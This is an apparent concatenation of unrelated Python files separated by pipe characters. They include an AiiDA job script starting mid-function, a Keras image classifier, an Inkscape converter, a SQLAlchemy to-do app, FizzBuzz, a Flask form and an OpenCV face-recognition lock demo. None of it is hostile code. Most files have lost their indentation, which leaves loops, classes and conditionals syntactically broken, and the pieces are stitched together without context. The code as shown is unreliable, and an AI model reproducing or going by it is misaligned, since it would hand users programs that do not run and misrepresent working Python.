calc.set_max_wallclock_seconds(1 * 60)
calc.set_withmpi(False)
calc.set_resources({"num_machines": 1, "num_mpiprocs_per_machine": 1})
# Prepare input parameters
from aiida.orm import DataFactory
Parameters = DataFactory('gudhi.rdm')
parameters = Parameters(dict={'max-edge-length': 4.2})
calc.use_parameters(parameters)
SinglefileData = DataFactory('singlefile')
    # NOTE: ``gt`` (supplying TEST_DIR) is not imported above; it is assumed
    # to come from the surrounding test package.
    distance_matrix = SinglefileData(
        file=os.path.join(gt.TEST_DIR, 'sample_distance.matrix'))
calc.use_distance_matrix(distance_matrix)
if submit:
calc.store_all()
calc.submit()
print("submitted calculation; calc=Calculation(uuid='{}') # ID={}"\
.format(calc.uuid,calc.dbnode.pk))
else:
subfolder, script_filename = calc.submit_test()
path = os.path.relpath(subfolder.abspath)
print("submission test successful")
print("Find remote folder in {}".format(path))
print("In order to actually submit, add '--submit'")
if __name__ == '__main__':
main()
|
#nvidia-smi
#~/.keras/keras.json
#import keras
#print keras.__version__
#1.2.2
#https://faroit.github.io/keras-docs/1.2.2/
from keras.models import Sequential
from keras.models import model_from_json
from keras.layers.core import Dense
from keras.layers.core import Flatten
from keras.layers.core import Dropout
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D
from keras.layers.normalization import BatchNormalization
from keras.optimizers import Adam
from keras.preprocessing.image import ImageDataGenerator
from sklearn.metrics import roc_auc_score
#check
#from tensorflow.python.client import device_lib
#print(device_lib.list_local_devices())
#load previous model
#json_file = open('cnn_model_3.json', 'r')
#loaded_model_json = json_file.read()
#json_file.close()
#classification = model_from_json(loaded_model_json)
classification = Sequential()
classification.add(Conv2D(16, 3, 3, input_shape=(128, 128, 3), activation = 'relu'))
classification.add(MaxPooling2D())
classification.add(Conv2D(64, 3, 3, activation = 'relu'))
classification.add(MaxPooling2D())
classification.add(Conv2D(128, 3, 3, activation = 'relu'))
classification.add(MaxPooling2D())
classification.add(Conv2D(256, 3, 3, activation = 'relu'))
classification.add(MaxPooling2D())
classification.add(Conv2D(512, 3, 3, activation = 'relu'))
classification.add(MaxPooling2D())
classification.add(Dropout(0.25))
classification.add(Flatten())
classification.add(Dense(1024, activation = 'relu'))
classification.add(BatchNormalization())
classification.add(Dense(1, activation = 'sigmoid'))
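# Shape walk-through (a sketch, assuming Keras 1.x defaults of 'valid' 3x3
# convolutions and 2x2 max pooling): 128 -> 126 -> 63 -> 61 -> 30 -> 28 -> 14
# -> 12 -> 6 -> 4 -> 2, so Flatten sees 2 * 2 * 512 = 2048 features.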
adam_optimizer = Adam(lr=0.0001, decay=1e-6)
classification.compile(optimizer=adam_optimizer, loss='binary_crossentropy', metrics = ['accuracy'])
for layer in classification.layers:
print(str(layer.name)+" "+str(layer.input_shape)+" -> "+str(layer.output_shape))
#train on all training set
train_all_data_gen = ImageDataGenerator(rotation_range=30, shear_range=0.2, zoom_range=0.2, horizontal_flip=True, vertical_flip=True, fill_mode='nearest', width_shift_range = 0.2,
height_shift_range = 0.2)
train_all_gen = train_all_data_gen.flow_from_directory('training_set_all', target_size=(128, 128), batch_size=25, class_mode='binary')
classification.fit_generator(train_all_gen, samples_per_epoch=2295, nb_epoch=20)
#score 0.964
classification.fit_generator(train_all_gen, samples_per_epoch=2295, nb_epoch=10)
#score 0.978
#mv test/*.jpg test/unknown/
test_data_gen = ImageDataGenerator()
test_gen = test_data_gen.flow_from_directory('test', target_size=(128, 128), batch_size=25, class_mode='binary', shuffle=False)
prediction = classification.predict_generator(test_gen, 1531)
result = []
filenames = test_gen.filenames
for i in range(len(filenames)):
result.append((int(filenames[i].split("/")[1].split(".")[0]), prediction[i][0]))
result.sort(key=lambda tup: tup[0])
with open("submission7_all_4.csv", "w") as output:
output.write("name,invasive\n")
for i in range(0, len(result)):
output.write(str(result[i][0])+","+str(result[i][1])+"\n")
|
#!/usr/bin/python3.6
import os
import sys
import argparse
from subprocess import call
parser = argparse.ArgumentParser(description='Use inkscape to convert a file from svg to png.')
parser.add_argument('file', type=argparse.FileType('r'), nargs='+', default=None, help='SVG file')
args = parser.parse_args()
# print(args.file)
for f in args.file:
fstring, fextension = os.path.splitext(f.name)
    if fextension != '.svg':
parser.print_usage()
sys.exit()
pngfile = fstring+'.png'
# print(f.name)
# print(pngfile)
call(['inkscape', '--verb=FitCanvasToDrawing', '--verb=FileSave', '--verb=FileQuit', f.name])
call(['inkscape', '-z', '--export-dpi=300', f.name, '-e', pngfile])
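# Usage (hypothetical filenames): ./svg2png.py figure1.svg figure2.svg
# first fits each canvas to its drawing in-place, then exports a 300 dpi PNG
# next to each source file.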
|
# To-Do List
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, Date
from sqlalchemy.orm import sessionmaker
from datetime import datetime, timedelta
class DBCon:
Base = declarative_base()
def db_session(self):
engine = create_engine('sqlite:///todo.db?check_same_thread=false')
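        # check_same_thread=false lets this single SQLite connection be shared
        # across threads; fine for a small CLI, unsafe under concurrent writes.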
self.Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
session.commit()
return session
class Table(DBCon.Base):
__tablename__ = 'task'
id = Column(Integer, primary_key=True)
task = Column(String)
    # Use a callable so the default is evaluated per insert, not once at import
    deadline = Column(Date, default=lambda: datetime.today().date())
def __repr__(self):
return 'id={}, task={}, deadline={}'.format(self.id, self.task, self.deadline)
class ToDoList:
_session = None
def __init__(self, session):
self._session = session
def add_single_row(self, single_row_data):
self._session.add(single_row_data)
self._session.commit()
def get_all_table_rows_by_date(self, day):
rows = self._session.query(Table).filter(Table.deadline == day).all()
self._session.commit()
return rows
def get_all_tasks(self):
rows = self._session.query(Table.task, Table.deadline).order_by(Table.deadline).all()
self._session.commit()
return rows
def get_all_tasks_by_date(self):
day = datetime.today().date()
rows = self._session.query(Table.task, Table.deadline).filter(Table.deadline < day).order_by(
Table.deadline).all()
self._session.commit()
return rows
def delete_row_by_task_date(self, task, date):
self._session.query(Table).filter(Table.task == task, Table.deadline == date).delete()
self._session.commit()
return True
@staticmethod
def take_input():
print("1) Today's tasks")
print("2) Week's tasks")
print('3) All tasks')
print('4) Missed tasks')
print('5) Add task')
print('6) Delete task')
print('0) Exit')
return input()
@staticmethod
def take_task_input():
print('Enter task')
task = input()
print('Enter deadline') # YYYY-MM-DD
deadline = input()
return task, deadline
def print_today_task(self, day=None, week_task=False):
if day is None:
day = datetime.today().date()
which_day = 'Today'
if week_task:
which_day = day.strftime("%A")
print('{} {} {}:'.format(which_day, day.day, day.strftime('%b')))
table_rows = self.get_all_table_rows_by_date(day)
if len(table_rows) >= 1:
for id_n, row in enumerate(table_rows):
print('{}. {}'.format(id_n + 1, row.task))
else:
print('Nothing to do!')
print()
def print_week_task(self):
today = datetime.today().date()
for day_diff in range(7):
req_date = today + timedelta(days=day_diff)
self.print_today_task(req_date, week_task=True)
def print_all_tasks(self):
task_rows = self.get_all_tasks()
if len(task_rows) >= 1:
print('All tasks:')
for id_n, task_row in enumerate(task_rows):
day = task_row[1]
print('{}. {}. {} {}'.format(id_n + 1, task_row[0], day.day, day.strftime('%b')))
def add_tasks(self):
input_task, deadline = self.take_task_input()
        task_row = Table(task=input_task, deadline=datetime.strptime(deadline, '%Y-%m-%d').date())
self.add_single_row(task_row)
print('The task has been added!')
def missed_tasks(self):
task_rows = self.get_all_tasks_by_date()
if len(task_rows) >= 1:
print('Missed tasks:')
for id_n, task_row in enumerate(task_rows):
day = task_row[1]
print('{}. {}. {} {}'.format(id_n + 1, task_row[0], day.day, day.strftime('%b')))
print()
def delete_task(self):
task_rows = self.get_all_tasks_by_date()
if len(task_rows) >= 1:
            print('Choose the number of the task you want to delete:')
task_info = dict()
for id_n, task_row in enumerate(task_rows):
task = task_row[0]
day = task_row[1]
task_id = id_n + 1
task_info[task_id] = [task, day]
print('{}. {}. {} {}'.format(task_id, task, day.day, day.strftime('%b')))
task_id = int(input().strip())
task_to_delete = task_info[task_id][0]
task_date = task_info[task_id][1]
if self.delete_row_by_task_date(task_to_delete, task_date):
print('The task has been deleted!')
else:
print('Nothing to delete')
# Run program
db_sess = DBCon().db_session()
toDoList = ToDoList(db_sess)
while True:
work_input = toDoList.take_input()
if work_input == '1':
toDoList.print_today_task()
elif work_input == '2':
toDoList.print_week_task()
elif work_input == '3':
toDoList.print_all_tasks()
elif work_input == '4':
toDoList.missed_tasks()
elif work_input == '5':
toDoList.add_tasks()
elif work_input == '6':
toDoList.delete_task()
elif work_input == '0':
print('Bye!')
quit()
|
__author__ = 'sonic-server'
from handler import *
handlers = [
(r'/', home_handler),
(r'/api/dataChannel', data_handler),
(r'/api/ctrl', ctrl_handler)
]
modules = {
}
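# A hedged wiring sketch (assumes Tornado and the handlers from handler.py;
# not part of the original module):
if __name__ == '__main__':
    import tornado.ioloop
    import tornado.web
    app = tornado.web.Application(handlers)
    app.listen(8888)
    tornado.ioloop.IOLoop.current().start()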
|
#!/usr/bin/env python
from solidfire.common import ApiServerError
from tests.base_test import SolidFireBaseTest
class TestApiServerError(SolidFireBaseTest):
def test_should_provide_defaults_with_empty_string(self):
api_error = ApiServerError('aMethod', '')
self.assertEqual(api_error.error_name, 'Unknown')
self.assertEqual(api_error.error_code, 500)
self.assertEqual(api_error.message, None)
def test_should_provide_defaults(self):
api_error = ApiServerError('aMethod', '{}')
self.assertEqual(api_error.error_name, 'Unknown')
self.assertEqual(api_error.error_code, 500)
self.assertEqual(api_error.message, None)
def test_should_convert_code_to_int(self):
api_error = ApiServerError('aMethod', '{"error": {"code": "404"}}')
self.assertEqual(api_error.error_code, 404)
def test_should_map_provided_json(self):
api_error = ApiServerError(
'aMethod',
'{ \
"error" : { \
"name": "error_name", \
"code": 505, \
"message": "aMessage" \
} \
}',
)
self.assertEqual(api_error.error_name, 'error_name')
self.assertEqual(api_error.error_code, 505)
self.assertEqual(api_error.message, 'aMessage')
|
#!/usr/bin/env python3
from argparse import ArgumentParser
def calc_fizzbuzz(n, rules=None):
    if rules is None:  # guard so a missing ruleset doesn't crash .items()
        rules = {}
    string = ''
for divisor, result in rules.items():
if n % divisor == 0:
string += result
if string == '':
string += str(n)
return string
def create_rules():
print('Welcome to the interactive rule generator, to exit submit an empty string as a divisor')
ruleset = {}
while True:
temp = input('Please enter a divisor: ')
if temp == '':
break
try:
ruleset[int(temp)] = input('Please enter the result: ')
except ValueError:
print('You entered an invalid divisor, please try again')
return ruleset
def fizzbuzz(maximum, rules=None):
    for i in range(1, maximum + 1):
print(calc_fizzbuzz(i, rules))
if __name__ == '__main__': # pragma: no cover
parser = ArgumentParser(description="Pass in your fizzbuzz numba!!!")
parser.add_argument(
"n", help='Please provide a positive integer for the maximum value')
parser.add_argument("-i", help='Use this option to enter interactive mode and define the rules before executing',
dest='interactive', action='store_true')
args = parser.parse_args()
try:
n = int(args.n)
except ValueError:
print("You entered an invalid maximum value, please try again")
exit(1)
if args.interactive:
# interactive mode selected
ruleset = create_rules()
else:
# defaulting to FizzBuzzBazz
ruleset = {3: 'Fizz', 5: 'Buzz', 7: 'Bazz'}
fizzbuzz(n, ruleset)
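# Example (default ruleset): fizzbuzz(21, {3: 'Fizz', 5: 'Buzz', 7: 'Bazz'})
# prints 1, 2, Fizz, 4, Buzz, Fizz, Bazz, ... ending in FizzBazz, since 21 is
# divisible by both 3 and 7.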
|
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import Email, DataRequired
class SignUpForm(FlaskForm):
email = StringField('Email',
validators=[DataRequired(), Email()])
CourseName = StringField('CourseName',
validators=[DataRequired()])
CourseNumber = StringField('CourseNumber',
validators=[DataRequired()])
CourseSection = StringField('CourseSection',
validators=[DataRequired()])
submit = SubmitField('Sign Up') |
import os.path
def python():
namethefile = input("INPUT THE NAME OF THE FILE \n")
if os.path.isfile(namethefile+".py"):
files = open(namethefile+".py","r+")
else:
files = open(namethefile+".py","x")
files.close()
files = open(namethefile+".py","r+")
files.write("import random \n import time \n ")
files.close()
print("File created!")
python()
|
import cv2
import pathlib
face_classifier = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
models = []  # avoid shadowing the built-in ``list``
namelist = []
currentDirectory = pathlib.Path('./TrainedFaces/')
for currentFile in currentDirectory.iterdir():
    model = cv2.face.LBPHFaceRecognizer_create()
    model.read(str(currentFile))
    namelist.append(currentFile.name)  # portable, unlike splitting on '\\'
    models.append(model)
def face_detector(img):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_classifier.detectMultiScale(gray, 1.3, 5)
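    # detectMultiScale(gray, 1.3, 5): 1.3 is the scale step between image
    # pyramid levels, 5 the minimum neighbours a candidate box needs to be
    # kept; both are standard Haar-cascade tuning knobs.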
    if len(faces) == 0:
return img, []
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 255), 2)
roi = img[y:y + h, x:x + w]
roi = cv2.resize(roi, (200, 200))
return img, roi
cap = cv2.VideoCapture(0)
image = 0
while True:
ret, frame = cap.read()
image, face = face_detector(frame)
cv2.imshow('Face Recognition', image)
if cv2.waitKey(1) == 13: # 13 is the Enter Key
try:
face = cv2.cvtColor(face, cv2.COLOR_BGR2GRAY)
            min_score = 500  # lower LBPH distance means a better match
            index = -1
            for i in range(0, len(models)):
                results = models[i].predict(face)
                print(i)
                if results[1] < min_score:
                    min_score = results[1]
                    index = i
            if min_score < 500:
                confidence = int(100 * (1 - min_score / 400))
                display_string = str(confidence) + '% Confident it is ' + namelist[index].split('.')[0]
cv2.putText(image, display_string, (100, 120), cv2.FONT_HERSHEY_COMPLEX, 1, (255, 120, 150), 2)
if confidence > 75:
cv2.putText(image, "Unlocked", (250, 450), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 0), 2)
cv2.imshow('Face Recognition', image)
else:
cv2.putText(image, "Locked", (250, 450), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 2)
cv2.imshow('Face Recognition', image)
except:
cv2.putText(image, "No Face Found", (220, 120), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 2)
cv2.putText(image, "Locked", (250, 450), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 2)
cv2.imshow('Face Recognition', image)
pass
break
while True:
cv2.imshow('Face Recognition', image)
if cv2.waitKey(1) == 13:
cap.release()
cv2.destroyAllWindows()
break |